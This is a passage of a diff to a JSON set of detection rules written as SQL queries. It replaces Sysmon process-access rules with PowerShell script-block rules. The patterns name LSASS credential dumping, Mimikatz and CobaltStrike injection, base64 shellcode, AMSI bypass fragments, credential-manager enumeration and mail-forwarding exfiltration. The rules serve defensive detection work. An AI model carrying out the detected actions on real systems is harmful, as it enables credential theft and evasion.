'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" ], - "filename": "proc_access_win_uac_bypass_wow64_logger.yml" + "filename": "posh_ps_office_comobject_registerxll.yml" }, { - "title": "Potential Shellcode Injection", - "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", - "status": "experimental", - "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", - "author": "Bhabesh Raj", + "title": "PowerShell ShellCode", + "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", + "status": "test", + "description": "Detects Base64 encoded Shellcode", + "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1055" + "attack.t1055", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft 
Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" ], - "filename": "proc_access_win_shellcode_inject_msf_empire.yml" + "filename": "posh_ps_shellcode_b64.yml" }, { - "title": "CMSTP Execution Process Access", - "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Enumerate Credentials from Windows Credential Manager With PowerShell", + "id": "603c6630-5225-49c1-8047-26c964553e0e", + "status": "test", + "description": "Adversaries may 
search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.003", - "attack.execution", - "attack.t1559.001", - "attack.g0069", - "attack.g0080", - "car.2019-04-001" + "attack.credential_access", + "attack.t1555" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%cmlua.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%vaultcmd%' ESCAPE '\\' AND ScriptBlockText LIKE '%/listcreds:%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Web Credentials%' ESCAPE '\\'))" ], - "filename": "proc_access_win_cmstp_execution_by_access.yml" + "filename": "posh_ps_enumerate_password_windows_credential_manager.yml" }, { - "title": "Credential Dumping Tools Accessing LSASS Memory", - "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", + "title": "Suspicious PowerShell Mailbox SMTP Forward Rule", + "id": "15b7abbb-8b40-4d01-9ee2-b51994b1d474", "status": "experimental", - "description": "Detects processes requesting access to LSASS memory via suspicious access masks. 
This is typical for credentials dumping tools", - "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", + "description": "Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002", - "car.2019-04-004" + "attack.exfiltration" ], "falsepositives": [ - "Likely" + "Legitimate usage of the cmdlet to forward emails" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND 
CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\MRT.exe' 
ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DeliverToMailboxAndForward %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ForwardingSmtpAddress %' ESCAPE '\\')" ], - "filename": "proc_access_win_cred_dump_lsass_access.yml" + "filename": "posh_ps_exchange_mailbox_smpt_forwarding_rule.yml" }, { - "title": "CobaltStrike BOF Injection Pattern", - "id": "09706624-b7f6-455d-9d02-adee024cee1d", + "title": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction", + "id": "dddfebae-c46f-439c-af7a-fdb6bde90218", "status": "test", - "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", - "author": "Christian Burkard (Nextron Systems)", + "description": 
"Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", + "author": "Ensar Şamil, @sblmsrsn, OSCD Community", "tags": [ - "attack.execution", - "attack.t1106", "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "App-V clients" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" ], - "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" + "filename": "posh_ps_syncappvpublishingserver_exe.yml" }, { - "title": "LSASS Memory Dump", - "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", - "status": "experimental", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Samir Bousseaden, Michael Haag", + "title": "NTFS Alternate Data Stream", + "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "status": "test", + "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", + "author": "Sami Ruohonen", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.defense_evasion", + "attack.t1564.004", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "False positives are present when looking for 0x1410. Exclusions may be required." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" ], - "filename": "proc_access_win_lsass_memdump.yml" + "filename": "posh_ps_ntfs_ads_access.yml" }, { - "title": "Load Undocumented Autoelevated COM Interface", - "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", + "title": "Powershell Create Scheduled Task", + "id": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb", "status": "test", - "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", - "author": "oscd.community, Dmitry Uchakin", + "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-ScheduledTaskAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskTrigger%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskPrincipal%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskSettingsSet%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-ScheduledTask%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Invoke-CimMethod%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName%' ESCAPE '\\' AND ScriptBlockText LIKE '%PS\\_ScheduledTask%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSpace%' ESCAPE '\\' AND ScriptBlockText LIKE '%Root\\\\Microsoft\\\\Windows\\\\TaskScheduler%' ESCAPE '\\')))" ], - "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" + "filename": "posh_ps_cmdlet_scheduled_task.yml" }, { - "title": "HandleKatz Duplicating LSASS Handle", - "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", - "status": "experimental", - "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", - "author": "Bhabesh Raj (rule), @thefLinkk", + "title": "Powershell LocalAccount Manipulation", + "id": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", + "status": "test", + "description": "Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1106", - "attack.defense_evasion", - "attack.t1003.001" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Disable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-LocalUser%' ESCAPE '\\'))" ], - "filename": "proc_access_win_handlekatz_lsass_access.yml" + "filename": "posh_ps_localuser.yml" }, { - "title": "Rare GrantedAccess Flags on LSASS Access", - "id": "678dfc63-fefb-47a5-a04c-26bcf8cc9f65", + "title": "Clear PowerShell History - PowerShell", + "id": "26b692dc-1722-49b2-b496-a8258aa6371d", "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects keywords that could indicate clearing PowerShell history", + "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.defense_evasion", + "attack.t1070.003" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND 
(TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess LIKE '%10' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR 
SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\')) OR (SourceCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\wermgr.exe -upload' ESCAPE '\\') OR (SourceImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\xampp-control.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x10'))))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%del%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND ScriptBlockText LIKE 
'%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" ], - "filename": "proc_access_win_rare_proc_access_lsass.yml" + "filename": "posh_ps_clear_powershell_history.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell", - "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", + "title": "AMSI Bypass Pattern Assembly GetType", + "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", "status": "experimental", - "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1562.001", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" ], - "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" }, { - "title": "Credential Dumping by Pypykatz", - "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", + "title": "Potential Suspicious PowerShell Keywords", + "id": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", "status": "test", - "description": "Detects LSASS process access by pypykatz for credential dumping.", - "author": "Bhabesh Raj", + "description": "Detects potentially suspicious keywords 
